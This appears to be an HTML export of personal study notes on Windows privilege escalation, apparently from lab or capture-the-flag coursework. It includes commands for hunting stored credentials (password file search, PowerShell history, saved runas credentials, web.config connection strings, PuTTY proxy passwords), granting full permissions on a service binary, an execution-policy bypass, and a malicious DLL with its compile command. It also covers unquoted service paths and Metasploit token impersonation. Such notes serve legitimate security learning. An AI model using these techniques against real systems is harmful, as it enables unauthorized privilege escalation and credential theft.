<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Privesc</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Privesc </h1>

      <div class="ck-content">
        <h2>Useful Info Commands</h2>

        <p><span style="background-color:transparent;color:rgb(14,16,26)">The following commands will help us enumerate users and their privileges on the target system.</span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">Current user’s privileges: </span><code>whoami /priv</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">List users: </span><code>net users</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">List details of a user: </span><code>net user username</code>

          <span
          style="background-color:transparent;color:rgb(14,16,26)">(e.g.</span><code>net user Administrator</code><span style="background-color:transparent;color:rgb(14,16,26)">)</span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">Other users logged in simultaneously: </span><code>qwinsta</code>

          <span
          style="background-color:transparent;color:rgb(14,16,26)">(the</span><code>query session</code><span style="background-color:transparent;color:rgb(14,16,26)"> command can be used the same way) </span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">User groups defined on the system: </span><code>net localgroup</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">List members of a specific group: </span><code>net localgroup groupname</code>

          <span
          style="background-color:transparent;color:rgb(14,16,26)">(e.g.</span><code>net localgroup Administrators</code>

        </p>
        <p><code>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"</code>

          <br /><span style="background-color:transparent;color:rgb(14,16,26)">The </span><code>findstr</code>

          <span
          style="background-color:transparent;color:rgb(14,16,26)">command can be used to find such files in a format similar to the one
            given below:</span>
        </p>
        <p><code>findstr /si password *.txt</code>

        </p>
        <p><code>wmic qfe get Caption,Description,HotFixID,InstalledOn</code>

        </p>
        <p>change persmissions with icacls: <code>icacls WService.exe /grant Everyone:F</code>

        </p>
        <p><a href="https://github.com/gtworek/Priv2Admin">https://github.com/gtworek/Priv2Admin</a> for
          privilege escalation with windows privileges.</p>
        <p>To change to a standard user while being admin, we can use token impersonation,
          just get a meterpreter shell and <code>load incognito</code>, <code>list_tokens -u</code> and
          the use <code>Impersonate_token "win/Admin"</code> to get a shell as that
          user.</p><pre><code class="language-text-plain">takeown /f C:\Windows\System32\Utilman.exe</code></pre>

         <h2>Unattended Windows Installations</h2>

        <ul>
          <li>C:\Unattend.xml</li>
          <li>C:\Windows\Panther\Unattend.xml</li>
          <li>C:\Windows\Panther\Unattend\Unattend.xml</li>
          <li>C:\Windows\system32\sysprep.inf</li>
          <li>C:\Windows\system32\sysprep\sysprep.xml</li>
        </ul>
         <h2>Powershell History</h2><pre><code class="language-text-plain">type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</code></pre><pre><code class="language-text-plain">cmdkey /list
runas /savecred /user:admin cmd.exe
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s</code></pre>

         <h2><span style="background-color:transparent;color:rgb(14,16,26)">WMIC</span></h2>

        <p><span style="background-color:transparent;color:rgb(14,16,26)">WMIC is a command-line tool on Windows that provides an interface for Windows Management Instrumentation (WMI). WMIC can provide more information than just installed patches. For example, it can be used to look for unquoted service path vulnerabilities we will see in later tasks. For newer Windows(21H1 and above) versions you will need to use the WMI PowerShell cmdlet.</span>

        </p>
         <h2><span style="background-color:transparent;color:rgb(14,16,26)">Scheduled Tasks</span></h2>

        <p><span style="background-color:transparent;color:rgb(14,16,26)">The </span><code>schtasks</code>

          <span
          style="background-color:transparent;color:rgb(14,16,26)"> command can be used to query scheduled tasks.</span>
        </p>
        <p><code>schtasks /query /fo LIST /v</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">The </span><code>driverquery</code>

          <span
          style="background-color:transparent;color:rgb(14,16,26)"> command will list drivers installed on the target system.</span>
        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">The query below will search for a service named “windefend” and return its current state.</span>

        </p>
        <p><code>sc query windefend</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">While the second approach will allow you to detect antivirus software without prior knowledge about its service name, the output may be overwhelming.</span>

        </p>
        <p><code>sc queryex type=service</code>

        </p>
         <h2>Enabling script execution</h2>

        <p>To run PowerUp on the target system, you may need to bypass the execution
          policy restrictions. To achieve this, you can launch PowerShell using the
          command below.</p><pre><code class="language-text-plain">powershell.exe -nop -exec bypass
wmic product get name,version,vendor
wmic service list brief | findstr  "Running"</code></pre>

         <h2>DLL Hijacking           </h2><pre><code class="language-text-plain">#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami &gt; C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}</code></pre>

        <p>compile with <code>x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll</code>

        </p>
        <p>If a service uses/requests a dll which is writeable/removable, we can
          replace that with our own malicious dll so when service is restarted with
          admin privilieges we can execute our command as System/Administrator</p>
         <h2><strong>Unquoted Service Path:</strong></h2>

        <p><span style="background-color:transparent;color:hsl(0,0%,100%)">when the service is launched, Windows follows a search order similar to what we have seen in the previous task. Imagine now we have a service (e.g. srvc) which has a binary path set to <code>C:\Program Files\topservice folder\subservice subfolder\srvc.exe</code></span>

        </p>
        <p><a href="https://github.com/mattymcfatty/unquotedPoC">https://github.com/mattymcfatty/unquotedPoC</a> </p>
        <p><span style="background-color:transparent;color:hsl(0,0%,100%)">To search for unquoted service paths, we can use the following:</span>

        </p><pre><code class="language-text-plain">wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """</code></pre>

        <p><span style="background-color:transparent;color:hsl(0,0%,100%)">To the human eye, this path would be merely different than <code>C:\Program Files\topservice folder\subservice subfolder\srvc.exe</code>. We would understand the service is trying to run srvc.exe.</span>

        </p>
        <p><span style="background-color:transparent;color:hsl(0,0%,100%)">Windows approaches the matter slightly differently. It knows the service is looking for an executable file, and it will start looking for it. If the path is written between quotes, Windows will directly go to the correct location and launch service.exe. </span>

        </p>
        <p><span style="background-color:transparent;color:hsl(0,0%,100%)">However, if the path is not written between quotes and if any folder name in the path has a space in its name, things may get complicated. Windows will append <code>.exe</code> and start looking for an executable, starting with the shortest possible path. In our example, this would be <code>C:\Program.exe</code>. If <code>program.exe</code> is not available, the second attempt will be to run <code>topservice.exe</code> under <code>C:\Program Files\</code>. If this also fails, another attempt will be made for <code>C:\Program Files\topservice folder\subservice.exe</code>. This process repeats until the executable is found. </span>

        </p>
        <p><span style="background-color:transparent;color:hsl(0,0%,100%)">Knowing this, if we can place an executable in a location we know the service is looking for one, it may be run by the service. </span>

        </p>
         <h2><span style="background-color:transparent;color:rgb(14,16,26)">Token Impersonation:</span></h2>

        <p>Service accounts, briefly mentioned in the introduction task, may have
          a higher privilege level than the low-level user you may have. In Windows
          versions before Server 2019 and 10 (version 1809), these service accounts
          are affected by an internal man-in-the-middle vulnerability. As you may
          know, man-in-the-middle (MitM) attacks are conducted by intercepting network
          traffic. In a similar fashion, higher privileged service accounts will
          be forced to authenticate to a local port we listen on. Once the service
          account attempts to authenticate, this request is modified to negotiate
          a security token for the "NT AUTHORITY\SYSTEM" account. The security token
          obtained can be used by the user we have in a process called "impersonation".
          Although it has led to several exploits, the impersonation rights were
          not a vulnerability. 
          <br />
          <br />In Windows versions after Server 2019 and Windows 10 (version 1809), impersonation
          rights were restricted. You can see below that a regular user does not
          have the "SeImpersonatePrivilege" privilege.</p>
        <p>use sweet Potato </p>
         <h2>Always Install Elevated:</h2>

        <p>This method requires two registry values to be set. You can query these
          from the command line using the commands below. </p>
        <p>
          <br /><code>reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer</code>

          <br
          /><code>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer</code>

          <br
          />
          <br />Remember, to be able to exploit this vulnerability, both should be set.
          Otherwise, exploitation will not be possible.       </p>
         <h2>Token Impersonation:</h2>

        <p>Enter: <i>load incognito </i>to load the incognito module in metasploit.</p>
        <p>To check which tokens are available, enter the <i>list_tokens -g</i>.</p>
        <p>Use the <i>impersonate_token "BUILTIN\Administrators"</i> command to impersonate
          the Administrators token.</p>
        <p>Even though you have a higher privileged token you may not actually have
          the permissions of a privileged user (this is due to the way Windows handles
          permissions - it uses the Primary Token of the process and not the impersonated
          token to determine what the process can or cannot do). Ensure that you
          migrate to a process with correct permissions (above questions answer).
          The safest process to pick is the services.exe process. First use the <i>ps </i>command
          to view processes and find the PID of the services.exe process. Migrate
          to this process using the command <i>migrate PID-OF-PROCESS</i>

        </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>